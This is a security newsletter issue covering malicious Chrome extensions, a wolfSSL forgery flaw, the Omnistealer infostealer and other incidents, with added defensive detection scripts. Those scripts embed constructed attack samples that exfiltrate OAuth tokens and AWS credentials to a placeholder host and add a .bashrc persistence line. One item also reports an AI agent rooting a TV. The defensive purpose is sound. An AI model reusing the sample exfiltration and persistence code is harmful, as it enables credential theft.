
108 Stealer Chrome Extensions 🧩, wolfSSL Cert Forgery 🔐, Kraken Insider Leak 🐙

TLDR

Together with JSOC IT

TLDR Information Security 2026-04-15

Your security score is probably 30 points lower than you think (Sponsor)

When organizations verify their posture through live integrations instead of questionnaires, scores come back 20–40 points lower on average. That gap is where breaches happen.

READY™ by JSOC IT connects directly to CrowdStrike, Okta, Microsoft 365, and 31 more tools to show what's actually true — not what you reported.

READY™ verifies your posture. JSOC IT deploys a Forward Deployed Engineer to fix it.

>> Find your real score

The Cyber Resilience Operating Layer JSOC IT, Inc.

🔓 Attacks & Vulnerabilities

108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure (7 minute read)

Socket's Threat Research Team identified 108 malicious Chrome extensions across ~20k installs operating as a coordinated MaaS campaign under shared C2 infrastructure at cloudapi[.]stream, with 54 extensions harvesting Google OAuth2 identity via chrome.identity.getAuthToken, one actively exfiltrating Telegram Web sessions every 15 seconds, and 45 containing a universal loadInfo() backdoor that opens operator-specified URLs on every browser start. All five publisher identities trace back to just two Google Cloud project numbers, and the C2 backend runs a Strapi CMS with a payment portal, confirming the identities are sold as a service. Defenders should block cloudapi[.]stream and top[.]rodeo at the network perimeter, scan extension bundles for the user_info/infoURL/chrome.tabs.create pattern, and flag any extension combining the identity permission with declarativeNetRequest rules that strip CSP headers.
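The three triage heuristics the summary recommends (identity permission combined with CSP-stripping declarativeNetRequest rules, the user_info/infoURL/chrome.tabs.create startup-backdoor pattern, and direct use of chrome.identity.getAuthToken) can be checked statically against an unpacked extension directory. The script below is an added example, not Socket's tooling or any of the reported extensions; the sample bundle it builds is constructed, the C2 URL is a placeholder, and the extra check for rules installed at runtime via updateDynamicRules/updateSessionRules is a caveat added here because a static rules.json scan alone misses them.

```python
"""Static triage of an unpacked Chrome extension for the indicators in the report."""
import json
import os
import re
import tempfile

# Response headers whose removal defeats a site's CSP.
CSP_HEADERS = {"content-security-policy", "content-security-policy-report-only"}
# Source tokens of the loadInfo()-style startup backdoor described in the report.
BACKDOOR_TOKENS = ("user_info", "infoURL", "chrome.tabs.create")
IDENTITY_API = re.compile(r"chrome\.identity\.getAuthToken\s*\(")
# Rules added at runtime never appear in a static ruleset file; flag them for manual review.
DYNAMIC_DNR = re.compile(r"declarativeNetRequest\.update(Dynamic|Session)Rules")


def _load_json(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def csp_stripping_rules(ext_dir, manifest):
    """Ids of static declarativeNetRequest rules that remove a CSP response header."""
    hits = []
    for res in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        path = os.path.join(ext_dir, res.get("path", ""))
        if not os.path.isfile(path):
            continue
        for rule in _load_json(path):
            action = rule.get("action", {})
            if action.get("type") != "modifyHeaders":
                continue
            for hdr in action.get("responseHeaders", []):
                if hdr.get("operation") == "remove" and hdr.get("header", "").lower() in CSP_HEADERS:
                    hits.append(rule.get("id"))
    return hits


def scan_sources(ext_dir):
    """Walk every .js file; return (backdoor tokens seen, uses identity API, uses dynamic DNR)."""
    tokens, uses_identity, dynamic = set(), False, False
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            tokens.update(t for t in BACKDOOR_TOKENS if t in src)
            uses_identity = uses_identity or bool(IDENTITY_API.search(src))
            dynamic = dynamic or bool(DYNAMIC_DNR.search(src))
    return tokens, uses_identity, dynamic


def triage(ext_dir):
    """Return human-readable findings for one unpacked extension directory."""
    manifest = _load_json(os.path.join(ext_dir, "manifest.json"))
    perms = set(manifest.get("permissions", []))
    rules = csp_stripping_rules(ext_dir, manifest)
    tokens, uses_identity, dynamic = scan_sources(ext_dir)
    findings = []
    if "identity" in perms and rules:
        findings.append(f"identity permission combined with CSP-stripping DNR rule(s) {rules}")
    if "identity" in perms and dynamic:
        findings.append("identity permission with DNR rules installed at runtime; review rule bodies")
    if tokens == set(BACKDOOR_TOKENS):
        findings.append("user_info/infoURL/chrome.tabs.create startup-backdoor pattern")
    if uses_identity:
        findings.append("calls chrome.identity.getAuthToken")
    return findings


def write_sample_bundle(ext_dir):
    """Constructed bundle combining all three indicators; not a real extension."""
    manifest = {
        "manifest_version": 3, "name": "constructed-sample", "version": "1.0",
        "permissions": ["identity", "declarativeNetRequest"],
        "host_permissions": ["<all_urls>"],
        "declarative_net_request": {"rule_resources": [{"id": "rs1", "enabled": True, "path": "rules.json"}]},
        "background": {"service_worker": "bg.js"},
    }
    rules = [{"id": 1, "priority": 1,
              "action": {"type": "modifyHeaders",
                         "responseHeaders": [{"header": "Content-Security-Policy", "operation": "remove"}]},
              "condition": {"urlFilter": "*", "resourceTypes": ["main_frame"]}}]
    bg_js = ("const infoURL = 'https://example.invalid/info';  // placeholder C2 (constructed)\n"
             "chrome.identity.getAuthToken({interactive: false}, t =>\n"
             "  fetch(infoURL + '/user_info?t=' + encodeURIComponent(t)));\n"
             "chrome.runtime.onStartup.addListener(() =>\n"
             "  fetch(infoURL).then(r => r.json()).then(d => chrome.tabs.create({url: d.url})));\n")
    with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(ext_dir, "rules.json"), "w", encoding="utf-8") as fh:
        json.dump(rules, fh)
    with open(os.path.join(ext_dir, "bg.js"), "w", encoding="utf-8") as fh:
        fh.write(bg_js)


def demo():
    """Build the constructed sample in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as d:
        write_sample_bundle(d)
        return triage(d)


if __name__ == "__main__":
    for finding in demo():
        print("FLAG:", finding)
```

Point triage() at a directory produced by unzipping a .crx (or at a profile's Extensions/<id>/<version>/ folder); an extension that trips the first finding alone is already worth pulling, since there is no legitimate reason for an identity-harvesting extension to strip CSP from every page.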
Critical flaw in wolfSSL library enables forged certificate use (2 minute read)

CVE-2026-5194 (critical) in wolfSSL lets an attacker present a forged certificate whose signature covers an undersized digest; because the verifier did not check the digest length and hash OID against the signature algorithm, the forgery passes ECDSA, DSA, ML-DSA, Ed25519, and Ed448 signature verification. wolfSSL ships in over 5 billion devices and applications. The flaw was patched in wolfSSL 5.9.1 (April 8). Teams running vendor firmware or distro-packaged builds should wait for downstream advisories rather than assume the upstream fix has reached them.
Nightclub Giant RCI Hospitality Reports Data Breach (2 minute read)

On March 23 RCI Hospitality discovered that an Insecure Direct Object Reference (IDOR) bug in an IIS server at RCI Internet Services had been exposing data on numerous independent contractors since March 19. Attackers accessed names, dates of birth, contact details, Social Security numbers, and driver's license numbers, but not customer or financial systems.

🧠 Strategies & Tactics

Omnistealer uses the blockchain to steal everything it can (2 minute read)

Omnistealer is a new infostealer that embeds encrypted staging code directly into transactions on TRON, Aptos, and Binance Smart Chain, exploiting the append-only nature of public ledgers to create a C2 infrastructure that defenders cannot take down. Delivered via fake LinkedIn/Upwork freelance job offers pointing to trojanized GitHub repositories, the malware targets over 10 password managers, 60+ browser-based crypto wallets, major browsers, and cloud storage credentials, with researchers estimating roughly 300,000 compromised credentials spanning financial firms, defense suppliers, and US government entities. Organizations should enforce sandbox policies for evaluating third-party code, block execution from user-writable directories, and monitor for outbound connections to blockchain RPC endpoints as an emerging C2 channel.
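The last recommendation, watching egress for blockchain RPC traffic, is easy to prototype against a proxy or firewall log. The detector below is an added example, not from the Omnistealer write-up: the log format, the client addresses and the endpoint suffix list are constructed for the demo (the suffixes are public gateways for the three chains named above, assumed here as illustrative; a real deployment should use a maintained list and include self-hosted nodes), and the transaction-lookup patterns are the operations a loader needs to read a payload out of a transaction. It aggregates per client so that a developer who hits one RPC once is not alerted, while a host that repeatedly reads transactions across several chains on a fixed cadence is.

```python
"""Flag internal hosts that repeatedly read on-chain data, a possible C2 channel."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Public RPC/API gateways per chain (assumed suffixes; extend from a maintained list).
RPC_SUFFIXES = {
    "tron": ("trongrid.io", "tronstack.io"),
    "aptos": ("aptoslabs.com",),
    "bsc": ("binance.org", "bnbchain.org"),
}
# Read-a-transaction-by-hash operations on those chains (assumed patterns). The proxy
# is assumed to log the JSON-RPC method name in the request column for POST /.
TX_LOOKUP = re.compile(r"wallet/gettransactionbyid|/v1/transactions/by_hash/|eth_getTransactionByHash", re.I)

# Constructed log format: "<iso-ts> <client-ip> <dest-host> <method> <request>"
LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")

SAMPLE_LOG = """\
2026-04-14T10:00:00Z 10.0.0.5 api.trongrid.io POST /wallet/gettransactionbyid
2026-04-14T10:00:30Z 10.0.0.9 github.com GET /org/repo
2026-04-14T10:00:40Z 10.0.0.9 pypi.org GET /simple/requests/
2026-04-14T10:01:00Z 10.0.0.5 fullnode.mainnet.aptoslabs.com GET /v1/transactions/by_hash/0xabc
2026-04-14T10:01:10Z 10.0.0.7 api.trongrid.io GET /wallet/getnowblock
2026-04-14T10:02:00Z 10.0.0.5 bsc-dataseed.binance.org POST eth_blockNumber
2026-04-14T10:03:00Z 10.0.0.5 bsc-dataseed.binance.org POST eth_getTransactionByHash
"""


def classify(host, request):
    """Chain name for a known RPC host, 'unknown-chain' for a tx lookup elsewhere, else None."""
    for chain, suffixes in RPC_SUFFIXES.items():
        if any(host == s or host.endswith("." + s) for s in suffixes):
            return chain
    return "unknown-chain" if TX_LOOKUP.search(request) else None


def detect(lines, min_hits=2):
    """Aggregate RPC events per client; alert on clients with at least min_hits events."""
    events = defaultdict(list)
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, src, host, _method, request = m.groups()
        chain = classify(host, request)
        if chain:
            t = datetime.fromisoformat(ts.replace("Z", "+00:00"))
            events[src].append((t, chain, host, bool(TX_LOOKUP.search(request))))
    alerts = {}
    for src, evs in events.items():
        if len(evs) < min_hits:
            continue
        evs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(evs, evs[1:])]
        alerts[src] = {
            "chains": sorted({e[1] for e in evs}),
            "tx_lookups": sum(e[3] for e in evs),
            "median_gap_s": median(gaps) if gaps else None,  # a tight median suggests beaconing
        }
    return alerts


if __name__ == "__main__":
    for client, info in detect(SAMPLE_LOG.splitlines()).items():
        print(client, info)
```

Tune min_hits and add an allow-list for hosts that legitimately run wallets or nodes; the useful signal is the combination of several chains, transaction-by-hash reads and a regular interval from a host with no business reason to touch a ledger.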
Codex Hacked a Samsung TV (8 minute read)

Researchers gave OpenAI Codex a shell inside a Samsung TV browser process, plus matching KantS2 firmware source and a controlled toolchain. Codex audited exposed Novatek ntk* kernel drivers, used /dev/ntksys as a physmap primitive validated via /dev/ntkhdma, reconstructed RAM ranges from boot args, and then located and patched cred structures in physical memory to turn the browser context into a root shell on the live TV.

🧑‍💻 Launches & Tools

Threat Report: AI is Accelerating Cloud Risk (Sponsor)

80% of cloud breaches still start with the basics - and AI is making them faster.

Get insights on the patterns behind today's cloud attacks with the 2026 Cloud Threat Report from Wiz.

Running AI agents with customized templates using Docker sandbox (5 minute read)

Andrew Lock extends the sbx Docker sandbox tool by showing how to bake pre-installed toolchains into custom OCI images, eliminating per-session reinstalls and keeping AI agents isolated in microVMs with scoped filesystem access and a network proxy that injects credentials without exposing them to the agent. For teams needing a non-standard base image, Lock reverse-engineered the docker/sandbox-templates layer structure to transplant sandbox scaffolding onto an arbitrary distro, demonstrated with a Debian image matching the Datadog .NET SDK build environment. Isolating the Claude Code install in its own multi-stage build stage enables rapid version updates via --no-cache-filter without rebuilding the full image.
Supply Chain Monitor (GitHub Repo)

Elastic's supply-chain-monitor polls PyPI's XML-RPC changelog feed and npm's CouchDB replication stream for new releases across up to 15,000 top packages per ecosystem, diffs each release against its predecessor, and routes the unified diff to Cursor Agent CLI for LLM-based malicious/benign classification, with Slack alerting on positive findings. Detection targets include obfuscated code, unexpected network calls, persistence writes, credential exfiltration, and typosquatting indicators. The tool was validated against real-world attacks including the Telnyx PyPI compromise and the axios npm supply chain incident.
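The diff-the-release step is the part worth seeing in code, because the classifier (LLM or otherwise) is only as good as what it is shown: the whole unified diff including newly added files, not just the changed ones. The example below is added here and is not Elastic's code; it substitutes regex heuristics for the LLM step so it runs offline, and the two release trees are constructed (a benign 1.0.0 and a 1.0.1 that adds a credential-stealing boot module with a placeholder exfiltration host).

```python
"""Diff two package releases and flag added lines matching the detection targets above."""
import difflib
import re

# Constructed release trees (filename -> file contents). Version 1.0.1 adds _boot.py.
RELEASE_1 = {
    "mypkg/__init__.py": "__version__ = '1.0.0'\n\ndef add(a, b):\n    return a + b\n",
    "setup.py": "from setuptools import setup\nsetup(name='mypkg', version='1.0.0')\n",
}
RELEASE_2 = {
    "mypkg/__init__.py": "__version__ = '1.0.1'\n\ndef add(a, b):\n    return a + b\n",
    "mypkg/_boot.py": (
        "import base64, os, urllib.request\n"
        "d = base64.b64decode('aW1wb3J0IG9z')\n"
        "exec(d)\n"
        "tok = open(os.path.expanduser('~/.aws/credentials')).read()\n"
        "urllib.request.urlopen('https://example.invalid/c', data=tok.encode())\n"
        "open(os.path.expanduser('~/.bashrc'), 'a').write('python -m mypkg._boot\\n')\n"
    ),
    "setup.py": "from setuptools import setup\nsetup(name='mypkg', version='1.0.1')\n",
}

# Heuristics standing in for the LLM classifier; one regex per detection target.
RULES = {
    "obfuscation": re.compile(r"base64\.b64decode|exec\(|eval\(|\\x[0-9a-f]{2}\\x"),
    "network": re.compile(r"urllib\.request|requests\.(get|post)|socket\.|http\.client"),
    "persistence": re.compile(r"\.bashrc|\.profile|crontab|systemd|HKCU|Startup"),
    "credentials": re.compile(r"\.aws/credentials|\.npmrc|\.pypirc|\.ssh/|\.git-credentials|_TOKEN"),
}


def release_diff(old, new):
    """Unified diff over the union of both trees, so added and removed files are included."""
    out = []
    for name in sorted(set(old) | set(new)):
        a = old.get(name, "").splitlines(keepends=True)
        b = new.get(name, "").splitlines(keepends=True)
        out.extend(difflib.unified_diff(a, b, fromfile=f"a/{name}", tofile=f"b/{name}"))
    return "".join(out)


def classify(diff_text):
    """Score only added lines; return (verdict, {category: [matching lines]})."""
    hits = {}
    for line in diff_text.splitlines():
        if not line.startswith("+") or line.startswith("+++"):
            continue
        body = line[1:]
        for cat, rx in RULES.items():
            if rx.search(body):
                hits.setdefault(cat, []).append(body.strip())
    # Two independent categories in one release is the threshold used here; a single
    # network import is too common in legitimate updates to alert on alone.
    verdict = "suspicious" if len(hits) >= 2 else "benign"
    return verdict, hits


if __name__ == "__main__":
    diff = release_diff(RELEASE_1, RELEASE_2)
    print(diff)
    print(classify(diff))
```

In production the two trees come from the sdist/tarball of the previous and current release; a diff that touches only version strings classifies as benign, which is the common case and the reason feeding the diff rather than the whole package keeps the classifier's input small.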
PySentry (GitHub Repo)

PySentry is a Rust-based Python dependency vulnerability scanner that parses uv.lock, Poetry, Pipfile, pyproject.toml, and requirements.txt formats, cross-referencing findings against PyPA Advisory Database, PyPI JSON API, and OSV.dev. It supports PEP 792 detection of archived, deprecated, and quarantined packages, with SARIF/JSON/Markdown output and a --forbid-quarantined flag for blocking malware-flagged packages in CI pipelines.

🎁 Miscellaneous

Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites (1 minute read)

A new corporate owner of WordPress developer Essential Plugin allegedly added a backdoor to dozens of acquired plug-ins, which later activated and pushed malicious code to sites using them. Anchor Hosting's Austin Ginder traced the supply chain attack and published a list of affected plug-ins. WordPress removed the plug-ins, but admins must manually check and uninstall them.
Bringing Rust to the Pixel Baseband (6 minute read)

Google is moving the Pixel 10 modem's DNS parser from C/C++ to Rust to cut memory-safety bugs in a high-risk, remotely reachable component. The team selected the hickory-proto DNS crate, added no_std support, and integrated it via Pigweed and direct rustc builds, resolving code-size, allocator, panic-handling, and symbol-conflict issues along the way. The Rust parser now drives DNS responses while reusing the existing C data structures and callbacks.
How Often Do Threat Actors Default On Promises to Delete Data? (3 minute read)

DataBreaches surveyed incident response firms and the broader infosec community on LinkedIn to assess whether ransomware groups honor data deletion commitments after payment. Respondents reported rarely encountering repeat extortion or confirmed data retention by the same group, suggesting most honor the transactional nature of the arrangement. One notable exception involved a client whose data was deleted from the primary attacker-controlled infrastructure but persisted on exfiltration intermediaries that the threat actor had not scrubbed.

Quick Links

New PHP Composer Flaws Enable Arbitrary Command Execution — Patches Released (2 minute read)

Two command injection bugs in Composer's Perforce VCS driver (CVE-2026-40176, CVE-2026-40261) allow arbitrary commands via malicious composer.json configs or crafted source references, even without Perforce installed.
Kraken Exchange Faces Extortion After Insider Recorded System Footage (2 minute read)

Two Kraken support staff members separately recorded internal customer management system footage and leaked it to criminal forums, exposing data from ~2,000 accounts and enabling an extortion attempt that Kraken has refused to pay while cooperating with federal law enforcement across multiple jurisdictions.
OpenSSL 4.0.0 released (1 minute read)

OpenSSL 4.0.0 ships with Encrypted Client Hello (RFC 9849), ML-DSA-MU, the SM2MLKEM768 post-quantum hybrid key-exchange group, and negotiated FFDHE in TLS 1.2, while dropping SSLv2/SSLv3, engine support, deprecated EC curves, and the fixed TLS version method functions.

Thanks for reading,
Prasanna Gautam, Eric Fernandez & Sammy Tbeile
